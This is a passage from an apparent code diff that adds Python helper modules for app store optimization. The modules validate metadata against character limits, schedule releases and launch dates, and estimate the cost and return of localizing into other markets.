        subtitle = app_data.get('subtitle', '')
        if not subtitle:
            validation_results['warnings'].append("Subtitle is empty - consider adding one for better discoverability")

        keywords = app_data.get('keywords', '')
        if len(keywords) < 80:
            validation_results['warnings'].append(
                f"Keywords field underutilized ({len(keywords)}/100 chars) - add more keywords"
            )

    def _validate_google_compliance(
        self,
        app_data: Dict[str, Any],
        validation_results: Dict[str, Any]
    ) -> None:
        """Validate Google Play Store compliance."""
        # Check for required fields
        if not app_data.get('privacy_policy_url'):
            validation_results['errors'].append("Privacy Policy URL is required")

        if not app_data.get('feature_graphic'):
            validation_results['errors'].append("Feature graphic (1024x500px) is required")

        # Check metadata character limits
        title = app_data.get('title', '')
        if len(title) > 50:
            validation_results['errors'].append(f"Title exceeds 50 characters ({len(title)})")

        short_desc = app_data.get('short_description', '')
        if len(short_desc) > 80:
            validation_results['errors'].append(f"Short description exceeds 80 characters ({len(short_desc)})")

        # Warnings
        if not short_desc:
            validation_results['warnings'].append("Short description is empty")
    def _calculate_next_versions(
        self,
        current_version: str,
        update_frequency: str,
        feature_count: int
    ) -> List[str]:
        """Calculate next version numbers."""
        # Parse current version (assume semantic versioning)
        parts = current_version.split('.')
        major = int(parts[0])
        minor = int(parts[1])
        patch = int(parts[2]) if len(parts) > 2 else 0

        versions = []
        for i in range(feature_count):
            if update_frequency in ('weekly', 'biweekly'):
                patch += 1
            else:  # monthly or quarterly
                minor += 1
                patch = 0

            versions.append(f"{major}.{minor}.{patch}")

        return versions
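The version-bump rule is simple: frequent (weekly/biweekly) releases increment the patch number, while slower (monthly/quarterly) cadences bump the minor number and reset the patch. A self-contained sketch of that rule, with an illustrative `next_versions` name standing in for the method:

```python
# Sketch of the version-bump rule in _calculate_next_versions:
# weekly/biweekly -> patch bump, monthly/quarterly -> minor bump.
def next_versions(current_version, update_frequency, count):
    parts = current_version.split('.')
    major = int(parts[0])
    minor = int(parts[1])
    patch = int(parts[2]) if len(parts) > 2 else 0  # tolerate "1.2" style versions
    versions = []
    for _ in range(count):
        if update_frequency in ('weekly', 'biweekly'):
            patch += 1
        else:  # monthly or quarterly
            minor += 1
            patch = 0
        versions.append(f"{major}.{minor}.{patch}")
    return versions
```

For example, two weekly updates after `1.2.3` give `1.2.4` and `1.2.5`, while monthly updates after `1.2` give `1.3.0`, `1.4.0`, and so on.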
    def _distribute_features(
        self,
        features: List[str],
        versions: List[str]
    ) -> List[Dict[str, Any]]:
        """Distribute features across versions."""
        features_per_version = max(1, len(features) // len(versions))

        schedule = []
        for i, version in enumerate(versions):
            start_idx = i * features_per_version
            end_idx = start_idx + features_per_version if i < len(versions) - 1 else len(features)

            schedule.append({
                'version': version,
                'features': features[start_idx:end_idx],
                'release_priority': 'high' if i == 0 else ('medium' if i < len(versions) // 2 else 'low')
            })

        return schedule
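The slicing logic divides features evenly and lets the final version absorb any remainder. A minimal sketch (function name illustrative, priority field omitted for brevity):

```python
# Sketch of the slicing in _distribute_features: integer division sets the
# chunk size; the last version's slice runs to the end of the list, so it
# picks up any leftover features when the split isn't even.
def distribute_features(features, versions):
    per_version = max(1, len(features) // len(versions))
    schedule = []
    for i, version in enumerate(versions):
        start = i * per_version
        end = start + per_version if i < len(versions) - 1 else len(features)
        schedule.append({'version': version, 'features': features[start:end]})
    return schedule
```

With three features and two versions, the first version gets one feature and the second gets the remaining two.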
    def _generate_whats_new_template(self, version_data: Dict[str, Any]) -> Dict[str, str]:
        """Generate What's New template for version."""
        features_list = '\n'.join([f"• {feature}" for feature in version_data['features']])

        template = f"""Version {version_data['version']}

{features_list}

We're constantly improving your experience. Thanks for using [App Name]!

Have feedback? Contact us at support@[company].com"""

        return {
            'version': version_data['version'],
            'template': template
        }

    def _generate_update_recommendations(self, update_frequency: str) -> List[str]:
        """Generate recommendations for update strategy."""
        recommendations = []

        if update_frequency == 'weekly':
            recommendations.append("Weekly updates signal active development, but make sure quality doesn't suffer")
        elif update_frequency == 'monthly':
            recommendations.append("Monthly updates are optimal for most apps - balance features and stability")

        recommendations.extend([
            "Include bug fixes in every update",
            "Update 'What's New' section with each release",
            "Respond to reviews mentioning fixed issues"
        ])

        return recommendations
    def _recommend_day_of_week(self, app_category: str) -> Dict[str, Any]:
        """Recommend best day of week to launch."""
        # General recommendations based on category
        if app_category.lower() in ['games', 'entertainment']:
            return {
                'recommended_day': 'Thursday',
                'rationale': 'People download entertainment apps before the weekend'
            }
        elif app_category.lower() in ['productivity', 'business']:
            return {
                'recommended_day': 'Tuesday',
                'rationale': 'Business users are most active mid-week'
            }
        else:
            return {
                'recommended_day': 'Wednesday',
                'rationale': 'Mid-week provides good balance and review potential'
            }

    def _recommend_seasonal_timing(self, app_category: str, current_date: str) -> Dict[str, Any]:
        """Recommend seasonal timing considerations."""
        current_dt = datetime.strptime(current_date, '%Y-%m-%d')
        month = current_dt.month

        # Periods to avoid
        avoid_periods = []
        if month == 12:
            avoid_periods.append("Late December - low user engagement during holidays")
        if month in [7, 8]:
            avoid_periods.append("Summer months - some categories see lower engagement")

        # Recommended periods
        good_periods = []
        if month in [1, 9]:
            good_periods.append("New Year/Back-to-school - high user engagement")
        if month in [10, 11]:
            good_periods.append("Pre-holiday season - good for shopping/gift apps")

        return {
            'current_month': month,
            'avoid_periods': avoid_periods,
            'good_periods': good_periods
        }

    def _analyze_competitive_timing(self, app_category: str) -> Dict[str, str]:
        """Analyze competitive timing considerations."""
        return {
            'recommendation': 'Research competitor launch schedules in your category',
            'strategy': 'Avoid launching the same week as major competitor updates'
        }
    def _calculate_optimal_dates(
        self,
        current_date: str,
        day_rec: Dict[str, Any],
        seasonal_rec: Dict[str, Any]
    ) -> List[str]:
        """Calculate optimal launch dates."""
        current_dt = datetime.strptime(current_date, '%Y-%m-%d')

        # Find the next occurrence of the recommended day
        target_day = day_rec['recommended_day']
        days_map = {'Monday': 0, 'Tuesday': 1, 'Wednesday': 2, 'Thursday': 3, 'Friday': 4}
        target_day_num = days_map.get(target_day, 2)

        days_ahead = (target_day_num - current_dt.weekday()) % 7
        if days_ahead == 0:
            days_ahead = 7

        next_target_date = current_dt + timedelta(days=days_ahead)

        optimal_dates = [
            next_target_date.strftime('%Y-%m-%d'),
            (next_target_date + timedelta(days=7)).strftime('%Y-%m-%d'),
            (next_target_date + timedelta(days=14)).strftime('%Y-%m-%d')
        ]

        return optimal_dates
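The date arithmetic above hinges on one trick: `(target - today) % 7` gives the number of days until the next occurrence of the target weekday, with a same-day hit pushed a full week out. A self-contained sketch of just that step (`next_weekday` is an illustrative name):

```python
from datetime import datetime, timedelta

# Core step of _calculate_optimal_dates: next occurrence of a target
# weekday (Monday=0 ... Sunday=6), always at least one day in the future.
def next_weekday(date_str, target_weekday):
    dt = datetime.strptime(date_str, '%Y-%m-%d')
    days_ahead = (target_weekday - dt.weekday()) % 7
    if days_ahead == 0:  # today is the target day -> use next week's
        days_ahead = 7
    return (dt + timedelta(days=days_ahead)).strftime('%Y-%m-%d')
```

Starting from Monday 2024-01-01, the next Wednesday is 2024-01-03, while asking for the next Monday skips ahead a full week to 2024-01-08.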
    def _generate_timing_recommendation(
        self,
        optimal_dates: List[str],
        seasonal_rec: Dict[str, Any]
    ) -> str:
        """Generate final timing recommendation."""
        if seasonal_rec['avoid_periods']:
            return f"Consider launching on {optimal_dates[1]} to avoid {seasonal_rec['avoid_periods'][0]}"
        elif seasonal_rec['good_periods']:
            return f"Launch on {optimal_dates[0]} to capitalize on {seasonal_rec['good_periods'][0]}"
        else:
            return f"Recommended launch date: {optimal_dates[0]}"
    def _identify_seasonal_opportunities(
        self,
        app_category: str,
        current_month: int
    ) -> List[Dict[str, Any]]:
        """Identify seasonal opportunities for category."""
        opportunities = []

        # Universal opportunities
        if current_month == 1:
            opportunities.append({
                'event': 'New Year Resolutions',
                'dates': 'January 1-31',
                'relevance': 'high' if app_category.lower() in ['health', 'fitness', 'productivity'] else 'medium'
            })

        if current_month in [11, 12]:
            opportunities.append({
                'event': 'Holiday Shopping Season',
                'dates': 'November-December',
                'relevance': 'high' if app_category.lower() in ['shopping', 'gifts'] else 'low'
            })

        # Category-specific
        if app_category.lower() == 'education' and current_month in [8, 9]:
            opportunities.append({
                'event': 'Back to School',
                'dates': 'August-September',
                'relevance': 'high'
            })

        return opportunities

    def _generate_seasonal_campaign(self, opportunity: Dict[str, Any]) -> Dict[str, Any]:
        """Generate campaign idea for seasonal opportunity."""
        return {
            'event': opportunity['event'],
            'campaign_idea': f"Create themed visuals and messaging for {opportunity['event']}",
            'metadata_updates': 'Update app description and screenshots with seasonal themes',
            'promotion_strategy': 'Consider limited-time features or discounts'
        }

    def _create_seasonal_timeline(self, campaigns: List[Dict[str, Any]]) -> List[str]:
        """Create implementation timeline for campaigns."""
        return [
            f"30 days before: Plan {campaign['event']} campaign strategy"
            for campaign in campaigns
        ]
def generate_launch_checklist(
    platform: str,
    app_info: Dict[str, Any],
    launch_date: Optional[str] = None
) -> Dict[str, Any]:
    """
    Convenience function to generate launch checklist.

    Args:
        platform: Platform ('apple', 'google', or 'both')
        app_info: App information
        launch_date: Target launch date

    Returns:
        Complete launch checklist
    """
    generator = LaunchChecklistGenerator(platform)
    return generator.generate_prelaunch_checklist(app_info, launch_date)
588
skills/app-store-optimization/localization_helper.py
Normal file
@@ -0,0 +1,588 @@
"""
Localization helper module for App Store Optimization.
Manages multi-language ASO optimization strategies.
"""

from typing import Dict, List, Any, Optional, Tuple


class LocalizationHelper:
    """Helps manage multi-language ASO optimization."""

    # Priority markets by language (based on app store revenue and user base)
    PRIORITY_MARKETS = {
        'tier_1': [
            {'language': 'en-US', 'market': 'United States', 'revenue_share': 0.25},
            {'language': 'zh-CN', 'market': 'China', 'revenue_share': 0.20},
            {'language': 'ja-JP', 'market': 'Japan', 'revenue_share': 0.10},
            {'language': 'de-DE', 'market': 'Germany', 'revenue_share': 0.08},
            {'language': 'en-GB', 'market': 'United Kingdom', 'revenue_share': 0.06}
        ],
        'tier_2': [
            {'language': 'fr-FR', 'market': 'France', 'revenue_share': 0.05},
            {'language': 'ko-KR', 'market': 'South Korea', 'revenue_share': 0.05},
            {'language': 'es-ES', 'market': 'Spain', 'revenue_share': 0.03},
            {'language': 'it-IT', 'market': 'Italy', 'revenue_share': 0.03},
            {'language': 'pt-BR', 'market': 'Brazil', 'revenue_share': 0.03}
        ],
        'tier_3': [
            {'language': 'ru-RU', 'market': 'Russia', 'revenue_share': 0.02},
            {'language': 'es-MX', 'market': 'Mexico', 'revenue_share': 0.02},
            {'language': 'nl-NL', 'market': 'Netherlands', 'revenue_share': 0.02},
            {'language': 'sv-SE', 'market': 'Sweden', 'revenue_share': 0.01},
            {'language': 'pl-PL', 'market': 'Poland', 'revenue_share': 0.01}
        ]
    }

    # Character limit multipliers by language (some languages need more/less space)
    CHAR_MULTIPLIERS = {
        'en': 1.0,
        'zh': 0.6,  # Chinese characters are more compact
        'ja': 0.7,  # Japanese uses kanji
        'ko': 0.8,  # Korean is relatively compact
        'de': 1.3,  # German words are typically longer
        'fr': 1.2,  # French tends to be longer
        'es': 1.1,  # Spanish slightly longer
        'pt': 1.1,  # Portuguese similar to Spanish
        'ru': 1.1,  # Russian similar length
        'ar': 1.0,  # Arabic varies
        'it': 1.1   # Italian similar to Spanish
    }

    def __init__(self, app_category: str = 'general'):
        """
        Initialize localization helper.

        Args:
            app_category: App category to prioritize relevant markets
        """
        self.app_category = app_category
        self.localization_plans = []
    def identify_target_markets(
        self,
        current_market: str = 'en-US',
        budget_level: str = 'medium',
        target_market_count: int = 5
    ) -> Dict[str, Any]:
        """
        Recommend priority markets for localization.

        Args:
            current_market: Current/primary market
            budget_level: 'low', 'medium', or 'high'
            target_market_count: Number of markets to target

        Returns:
            Prioritized market recommendations
        """
        # Determine tier priorities based on budget
        if budget_level == 'low':
            priority_tiers = ['tier_1']
            max_markets = min(target_market_count, 3)
        elif budget_level == 'medium':
            priority_tiers = ['tier_1', 'tier_2']
            max_markets = min(target_market_count, 8)
        else:  # high budget
            priority_tiers = ['tier_1', 'tier_2', 'tier_3']
            max_markets = target_market_count

        # Collect markets from priority tiers
        recommended_markets = []
        for tier in priority_tiers:
            for market in self.PRIORITY_MARKETS[tier]:
                if market['language'] != current_market:
                    recommended_markets.append({
                        **market,
                        'tier': tier,
                        'estimated_translation_cost': self._estimate_translation_cost(
                            market['language']
                        )
                    })

        # Sort by revenue share and limit
        recommended_markets.sort(key=lambda x: x['revenue_share'], reverse=True)
        recommended_markets = recommended_markets[:max_markets]

        # Calculate potential ROI
        total_potential_revenue_share = sum(m['revenue_share'] for m in recommended_markets)

        return {
            'recommended_markets': recommended_markets,
            'total_markets': len(recommended_markets),
            'estimated_total_revenue_lift': f"{total_potential_revenue_share * 100:.1f}%",
            'estimated_cost': self._estimate_total_localization_cost(recommended_markets),
            'implementation_priority': self._prioritize_implementation(recommended_markets)
        }
    def translate_metadata(
        self,
        source_metadata: Dict[str, str],
        source_language: str,
        target_language: str,
        platform: str = 'apple'
    ) -> Dict[str, Any]:
        """
        Generate localized metadata with character limit considerations.

        Args:
            source_metadata: Original metadata (title, description, etc.)
            source_language: Source language code (e.g., 'en')
            target_language: Target language code (e.g., 'es')
            platform: 'apple' or 'google'

        Returns:
            Localized metadata with character limit validation
        """
        # Get character multiplier
        target_lang_code = target_language.split('-')[0]
        char_multiplier = self.CHAR_MULTIPLIERS.get(target_lang_code, 1.0)

        # Platform-specific limits
        if platform == 'apple':
            limits = {'title': 30, 'subtitle': 30, 'description': 4000, 'keywords': 100}
        else:
            limits = {'title': 50, 'short_description': 80, 'description': 4000}

        localized_metadata = {}
        warnings = []

        for field, text in source_metadata.items():
            if field not in limits:
                continue

            # Estimate target length
            estimated_length = int(len(text) * char_multiplier)
            limit = limits[field]

            localized_metadata[field] = {
                'original_text': text,
                'original_length': len(text),
                'estimated_target_length': estimated_length,
                'character_limit': limit,
                'fits_within_limit': estimated_length <= limit,
                'translation_notes': self._get_translation_notes(
                    field,
                    target_language,
                    estimated_length,
                    limit
                )
            }

            if estimated_length > limit:
                warnings.append(
                    f"{field}: Estimated length ({estimated_length}) may exceed limit ({limit}) - "
                    f"condensing may be required"
                )

        return {
            'source_language': source_language,
            'target_language': target_language,
            'platform': platform,
            'localized_fields': localized_metadata,
            'character_multiplier': char_multiplier,
            'warnings': warnings,
            'recommendations': self._generate_translation_recommendations(
                target_language,
                warnings
            )
        }
    def adapt_keywords(
        self,
        source_keywords: List[str],
        source_language: str,
        target_language: str,
        target_market: str
    ) -> Dict[str, Any]:
        """
        Adapt keywords for target market (not just direct translation).

        Args:
            source_keywords: Original keywords
            source_language: Source language code
            target_language: Target language code
            target_market: Target market (e.g., 'France', 'Japan')

        Returns:
            Adapted keyword recommendations
        """
        # Cultural adaptation considerations (market-level list of notes)
        cultural_notes = self._get_cultural_keyword_considerations(target_market)

        # Search behavior differences
        search_patterns = self._get_search_patterns(target_market)

        adapted_keywords = []
        for keyword in source_keywords:
            adapted_keywords.append({
                'source_keyword': keyword,
                'adaptation_strategy': self._determine_adaptation_strategy(
                    keyword,
                    target_market
                ),
                # The helper returns a list of market-level notes, not a
                # per-keyword dict, so attach the same notes to each keyword.
                'cultural_considerations': cultural_notes,
                'priority': 'high' if keyword in source_keywords[:3] else 'medium'
            })

        return {
            'source_language': source_language,
            'target_language': target_language,
            'target_market': target_market,
            'adapted_keywords': adapted_keywords,
            'search_behavior_notes': search_patterns,
            'recommendations': [
                'Use native speakers for keyword research',
                'Test keywords with local users before finalizing',
                "Consider local competitors' keyword strategies",
                'Monitor search trends in target market'
            ]
        }

    def validate_translations(
        self,
        translated_metadata: Dict[str, str],
        target_language: str,
        platform: str = 'apple'
    ) -> Dict[str, Any]:
        """
        Validate translated metadata for character limits and quality.

        Args:
            translated_metadata: Translated text fields
            target_language: Target language code
            platform: 'apple' or 'google'

        Returns:
            Validation report
        """
        # Platform limits
        if platform == 'apple':
            limits = {'title': 30, 'subtitle': 30, 'description': 4000, 'keywords': 100}
        else:
            limits = {'title': 50, 'short_description': 80, 'description': 4000}

        validation_results = {
            'is_valid': True,
            'field_validations': {},
            'errors': [],
            'warnings': []
        }

        for field, text in translated_metadata.items():
            if field not in limits:
                continue

            actual_length = len(text)
            limit = limits[field]
            is_within_limit = actual_length <= limit

            validation_results['field_validations'][field] = {
                'text': text,
                'length': actual_length,
                'limit': limit,
                'is_valid': is_within_limit,
                'usage_percentage': round((actual_length / limit) * 100, 1)
            }

            if not is_within_limit:
                validation_results['is_valid'] = False
                validation_results['errors'].append(
                    f"{field} exceeds limit: {actual_length}/{limit} characters"
                )

        # Quality checks
        quality_issues = self._check_translation_quality(
            translated_metadata,
            target_language
        )

        validation_results['quality_checks'] = quality_issues

        if quality_issues:
            validation_results['warnings'].extend(
                [f"Quality issue: {issue}" for issue in quality_issues]
            )

        return validation_results

    def calculate_localization_roi(
        self,
        target_markets: List[str],
        current_monthly_downloads: int,
        localization_cost: float,
        expected_lift_percentage: float = 0.15
    ) -> Dict[str, Any]:
        """
        Estimate ROI of localization investment.

        Args:
            target_markets: List of market codes
            current_monthly_downloads: Current monthly downloads
            localization_cost: Total cost to localize
            expected_lift_percentage: Expected download increase (default 15%)

        Returns:
            ROI analysis
        """
        # Estimate market-specific lift
        market_data = []
        total_expected_lift = 0

        for market_code in target_markets:
            # Find market in priority lists
            market_info = None
            for tier_name, markets in self.PRIORITY_MARKETS.items():
                for m in markets:
                    if m['language'] == market_code:
                        market_info = m
                        break
                # The inner break only exits the tier loop; stop scanning
                # further tiers once a match is found.
                if market_info:
                    break

            if not market_info:
                continue

            # Estimate downloads from this market
            market_downloads = int(current_monthly_downloads * market_info['revenue_share'])
            expected_increase = int(market_downloads * expected_lift_percentage)
            total_expected_lift += expected_increase

            market_data.append({
                'market': market_info['market'],
                'current_monthly_downloads': market_downloads,
                'expected_increase': expected_increase,
                'revenue_potential': market_info['revenue_share']
            })

        # Calculate payback period (assuming $2 revenue per download)
        revenue_per_download = 2.0
        monthly_additional_revenue = total_expected_lift * revenue_per_download
        payback_months = (
            localization_cost / monthly_additional_revenue
            if monthly_additional_revenue > 0
            else float('inf')
        )

        return {
            'markets_analyzed': len(market_data),
            'market_breakdown': market_data,
            'total_expected_monthly_lift': total_expected_lift,
            'expected_monthly_revenue_increase': f"${monthly_additional_revenue:,.2f}",
            'localization_cost': f"${localization_cost:,.2f}",
            'payback_period_months': round(payback_months, 1) if payback_months != float('inf') else 'N/A',
            'annual_roi': (
                f"{((monthly_additional_revenue * 12 - localization_cost) / localization_cost * 100):.1f}%"
                if payback_months != float('inf')
                else 'Negative'
            ),
            'recommendation': self._generate_roi_recommendation(payback_months)
        }

    def _estimate_translation_cost(self, language: str) -> Dict[str, float]:
        """Estimate translation cost for a language."""
        # Base cost per word (professional translation)
        base_cost_per_word = 0.12

        # Language-specific multipliers
        multipliers = {
            'zh-CN': 1.5,  # Chinese requires specialist
            'ja-JP': 1.5,  # Japanese requires specialist
            'ko-KR': 1.3,
            'ar-SA': 1.4,  # Arabic (right-to-left)
            'default': 1.0
        }

        multiplier = multipliers.get(language, multipliers['default'])

        # Typical word counts for app store metadata
        typical_word_counts = {
            'title': 5,
            'subtitle': 5,
            'description': 300,
            'keywords': 20,
            'screenshots': 50  # Caption text
        }

        total_words = sum(typical_word_counts.values())
        estimated_cost = total_words * base_cost_per_word * multiplier

        return {
            'cost_per_word': base_cost_per_word * multiplier,
            'total_words': total_words,
            'estimated_cost': round(estimated_cost, 2)
        }

    def _estimate_total_localization_cost(self, markets: List[Dict[str, Any]]) -> str:
        """Estimate total cost for multiple markets."""
        total = sum(m['estimated_translation_cost']['estimated_cost'] for m in markets)
        return f"${total:,.2f}"

    def _prioritize_implementation(self, markets: List[Dict[str, Any]]) -> List[Dict[str, str]]:
        """Create phased implementation plan."""
        phases = []

        # Phase 1: Top revenue markets
        phase_1 = markets[:3]
        if phase_1:
            phases.append({
                'phase': 'Phase 1 (First 30 days)',
                'markets': ', '.join(m['market'] for m in phase_1),
                'rationale': 'Highest revenue potential markets'
            })

        # Phase 2: Remaining tier 1 and top tier 2
        phase_2 = markets[3:6]
        if phase_2:
            phases.append({
                'phase': 'Phase 2 (Days 31-60)',
                'markets': ', '.join(m['market'] for m in phase_2),
                'rationale': 'Strong revenue markets with good ROI'
            })

        # Phase 3: Remaining markets
        phase_3 = markets[6:]
        if phase_3:
            phases.append({
                'phase': 'Phase 3 (Days 61-90)',
                'markets': ', '.join(m['market'] for m in phase_3),
                'rationale': 'Complete global coverage'
            })

        return phases

    def _get_translation_notes(
        self,
        field: str,
        target_language: str,
        estimated_length: int,
        limit: int
    ) -> List[str]:
        """Get translation-specific notes for field."""
        notes = []

        if estimated_length > limit:
            notes.append(f"Condensing required - aim for {limit - 10} characters to allow buffer")

        if field == 'title' and target_language.startswith('zh'):
            notes.append("Chinese characters convey more meaning - may need fewer characters")

        if field == 'keywords' and target_language.startswith('de'):
            notes.append("German compound words may be longer - prioritize shorter keywords")

        return notes

    def _generate_translation_recommendations(
        self,
        target_language: str,
        warnings: List[str]
    ) -> List[str]:
        """Generate translation recommendations."""
        recommendations = [
            "Use professional native speakers for translation",
            "Test translations with local users before finalizing"
        ]

        if warnings:
            recommendations.append("Work with translator to condense text while preserving meaning")

        if target_language.startswith('zh') or target_language.startswith('ja'):
            recommendations.append("Consider cultural context and local idioms")

        return recommendations

    def _get_cultural_keyword_considerations(self, target_market: str) -> List[str]:
        """Get cultural considerations for keywords by market."""
        # Simplified example - real implementation would be more comprehensive.
        # Note: returns a list of market-level notes, so the annotation is
        # List[str] rather than a per-keyword dict.
        considerations = {
            'China': ['Avoid politically sensitive terms', 'Consider local alternatives to blocked services'],
            'Japan': ['Honorific language important', 'Technical terms often use katakana'],
            'Germany': ['Privacy and security terms resonate', 'Efficiency and quality valued'],
            'France': ['French language protection laws', 'Prefer French terms over English'],
            'default': ['Research local search behavior', 'Test with native speakers']
        }

        return considerations.get(target_market, considerations['default'])

    def _get_search_patterns(self, target_market: str) -> List[str]:
        """Get search pattern notes for market."""
        patterns = {
            'China': ['Use both simplified characters and romanization', 'Brand names often romanized'],
            'Japan': ['Mix of kanji, hiragana, and katakana', 'English words common in tech'],
            'Germany': ['Compound words common', 'Specific technical terminology'],
            'default': ['Research local search trends', 'Monitor competitor keywords']
        }

        return patterns.get(target_market, patterns['default'])

    def _determine_adaptation_strategy(self, keyword: str, target_market: str) -> str:
        """Determine how to adapt keyword for market."""
        # Simplified logic
        if target_market in ['China', 'Japan', 'Korea']:
            return 'full_localization'  # Complete translation needed
        elif target_market in ['Germany', 'France', 'Spain']:
            return 'adapt_and_translate'  # Some adaptation needed
        else:
            return 'direct_translation'  # Direct translation usually sufficient

    def _check_translation_quality(
        self,
        translated_metadata: Dict[str, str],
        target_language: str
    ) -> List[str]:
        """Basic quality checks for translations."""
        issues = []

        # Check for untranslated placeholders
        for field, text in translated_metadata.items():
            if '[' in text or '{' in text or 'TODO' in text.upper():
                issues.append(f"{field} contains placeholder text")

        # Check for excessive punctuation
        for field, text in translated_metadata.items():
            if text.count('!') > 3:
                issues.append(f"{field} has excessive exclamation marks")

        return issues

    def _generate_roi_recommendation(self, payback_months: float) -> str:
        """Generate ROI recommendation."""
        if payback_months <= 3:
            return "Excellent ROI - proceed immediately"
        elif payback_months <= 6:
            return "Good ROI - recommended investment"
        elif payback_months <= 12:
            return "Moderate ROI - consider if strategic market"
        else:
            return "Low ROI - reconsider or focus on higher-priority markets first"


def plan_localization_strategy(
    current_market: str,
    budget_level: str,
    monthly_downloads: int
) -> Dict[str, Any]:
    """
    Convenience function to plan localization strategy.

    Args:
        current_market: Current market code
        budget_level: Budget level
        monthly_downloads: Current monthly downloads

    Returns:
        Complete localization plan
    """
    helper = LocalizationHelper()

    target_markets = helper.identify_target_markets(
        current_market=current_market,
        budget_level=budget_level
    )

    # Extract market codes
    market_codes = [m['language'] for m in target_markets['recommended_markets']]

    # Calculate ROI
    estimated_cost = float(target_markets['estimated_cost'].replace('$', '').replace(',', ''))

    roi_analysis = helper.calculate_localization_roi(
        market_codes,
        monthly_downloads,
        estimated_cost
    )

    return {
        'target_markets': target_markets,
        'roi_analysis': roi_analysis
    }
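The payback arithmetic above reduces to one line once the $2-per-download assumption is made explicit. A minimal standalone sketch, where the function name and sample figures are illustrative and not part of the module:

```python
def estimate_payback_months(localization_cost: float,
                            expected_monthly_lift: int,
                            revenue_per_download: float = 2.0) -> float:
    """Months until the added revenue covers the localization cost.

    Mirrors the core of calculate_localization_roi: lift in downloads times
    assumed revenue per download gives monthly revenue; divide the cost by it.
    """
    monthly_revenue = expected_monthly_lift * revenue_per_download
    return localization_cost / monthly_revenue if monthly_revenue > 0 else float("inf")


# $1,200 localization cost, 300 extra downloads/month -> 1200 / 600 = 2.0 months
print(estimate_payback_months(1200.0, 300))
```

With a zero lift the function returns infinity, matching the `'N/A'` payback the method reports in that case.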
581
skills/app-store-optimization/metadata_optimizer.py
Normal file
@@ -0,0 +1,581 @@
"""
|
||||||
|
Metadata optimization module for App Store Optimization.
|
||||||
|
Optimizes titles, descriptions, and keyword fields with platform-specific character limit validation.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from typing import Dict, List, Any, Optional, Tuple
|
||||||
|
import re
|
||||||
|
|
||||||
|
|
||||||
|
class MetadataOptimizer:
    """Optimizes app store metadata for maximum discoverability and conversion."""

    # Platform-specific character limits
    CHAR_LIMITS = {
        'apple': {
            'title': 30,
            'subtitle': 30,
            'promotional_text': 170,
            'description': 4000,
            'keywords': 100,
            'whats_new': 4000
        },
        'google': {
            'title': 50,
            'short_description': 80,
            'full_description': 4000
        }
    }

    def __init__(self, platform: str = 'apple'):
        """
        Initialize metadata optimizer.

        Args:
            platform: 'apple' or 'google'
        """
        if platform not in ['apple', 'google']:
            raise ValueError("Platform must be 'apple' or 'google'")

        self.platform = platform
        self.limits = self.CHAR_LIMITS[platform]

    def optimize_title(
        self,
        app_name: str,
        target_keywords: List[str],
        include_brand: bool = True
    ) -> Dict[str, Any]:
        """
        Optimize app title with keyword integration.

        Args:
            app_name: Your app's brand name
            target_keywords: List of keywords to potentially include
            include_brand: Whether to include brand name

        Returns:
            Optimized title options with analysis
        """
        max_length = self.limits['title']

        title_options = []

        # Option 1: Brand name only
        if include_brand:
            option1 = app_name[:max_length]
            title_options.append({
                'title': option1,
                'length': len(option1),
                'remaining_chars': max_length - len(option1),
                'keywords_included': [],
                'strategy': 'brand_only',
                'pros': ['Maximum brand recognition', 'Clean and simple'],
                'cons': ['No keyword targeting', 'Lower discoverability']
            })

        # Option 2: Brand + primary keyword
        if target_keywords:
            primary_keyword = target_keywords[0]
            option2 = self._build_title_with_keywords(
                app_name,
                [primary_keyword],
                max_length
            )
            if option2:
                title_options.append({
                    'title': option2,
                    'length': len(option2),
                    'remaining_chars': max_length - len(option2),
                    'keywords_included': [primary_keyword],
                    'strategy': 'brand_plus_primary',
                    'pros': ['Targets main keyword', 'Maintains brand identity'],
                    'cons': ['Limited keyword coverage']
                })

        # Option 3: Brand + multiple keywords (if space allows)
        if len(target_keywords) > 1:
            option3 = self._build_title_with_keywords(
                app_name,
                target_keywords[:2],
                max_length
            )
            if option3:
                title_options.append({
                    'title': option3,
                    'length': len(option3),
                    'remaining_chars': max_length - len(option3),
                    'keywords_included': target_keywords[:2],
                    'strategy': 'brand_plus_multiple',
                    'pros': ['Multiple keyword targets', 'Better discoverability'],
                    'cons': ['May feel cluttered', 'Less brand focus']
                })

        # Option 4: Keyword-first approach (for new apps)
        if target_keywords and not include_brand:
            option4 = " ".join(target_keywords[:2])[:max_length]
            title_options.append({
                'title': option4,
                'length': len(option4),
                'remaining_chars': max_length - len(option4),
                'keywords_included': target_keywords[:2],
                'strategy': 'keyword_first',
                'pros': ['Maximum SEO benefit', 'Clear functionality'],
                'cons': ['No brand recognition', 'Generic appearance']
            })

        return {
            'platform': self.platform,
            'max_length': max_length,
            'options': title_options,
            'recommendation': self._recommend_title_option(title_options)
        }

    def optimize_description(
        self,
        app_info: Dict[str, Any],
        target_keywords: List[str],
        description_type: str = 'full'
    ) -> Dict[str, Any]:
        """
        Optimize app description with keyword integration and conversion focus.

        Args:
            app_info: Dict with 'name', 'key_features', 'unique_value', 'target_audience'
            target_keywords: List of keywords to integrate naturally
            description_type: 'full', 'short' (Google), 'subtitle' (Apple)

        Returns:
            Optimized description with analysis
        """
        if description_type == 'short' and self.platform == 'google':
            return self._optimize_short_description(app_info, target_keywords)
        elif description_type == 'subtitle' and self.platform == 'apple':
            return self._optimize_subtitle(app_info, target_keywords)
        else:
            return self._optimize_full_description(app_info, target_keywords)

    def optimize_keyword_field(
        self,
        target_keywords: List[str],
        app_title: str = "",
        app_description: str = ""
    ) -> Dict[str, Any]:
        """
        Optimize Apple's 100-character keyword field.

        Rules:
        - No spaces between commas
        - No plural forms if singular exists
        - No duplicates
        - Keywords in title/subtitle are already indexed

        Args:
            target_keywords: List of target keywords
            app_title: Current app title (to avoid duplication)
            app_description: Current description (to check coverage)

        Returns:
            Optimized keyword field (comma-separated, no spaces)
        """
        if self.platform != 'apple':
            return {'error': 'Keyword field optimization only applies to Apple App Store'}

        max_length = self.limits['keywords']

        # Extract words already in title (these don't need to be in keyword field)
        title_words = set(app_title.lower().split()) if app_title else set()

        # Process keywords
        processed_keywords = []
        for keyword in target_keywords:
            keyword_lower = keyword.lower().strip()

            # Skip if already in title
            if keyword_lower in title_words:
                continue

            # Split phrases into words, dropping duplicates and title words
            words = keyword_lower.split()
            for word in words:
                if word not in processed_keywords and word not in title_words:
                    processed_keywords.append(word)

        # Remove plurals if singular exists
        deduplicated = self._remove_plural_duplicates(processed_keywords)

        # Build keyword field within 100 character limit
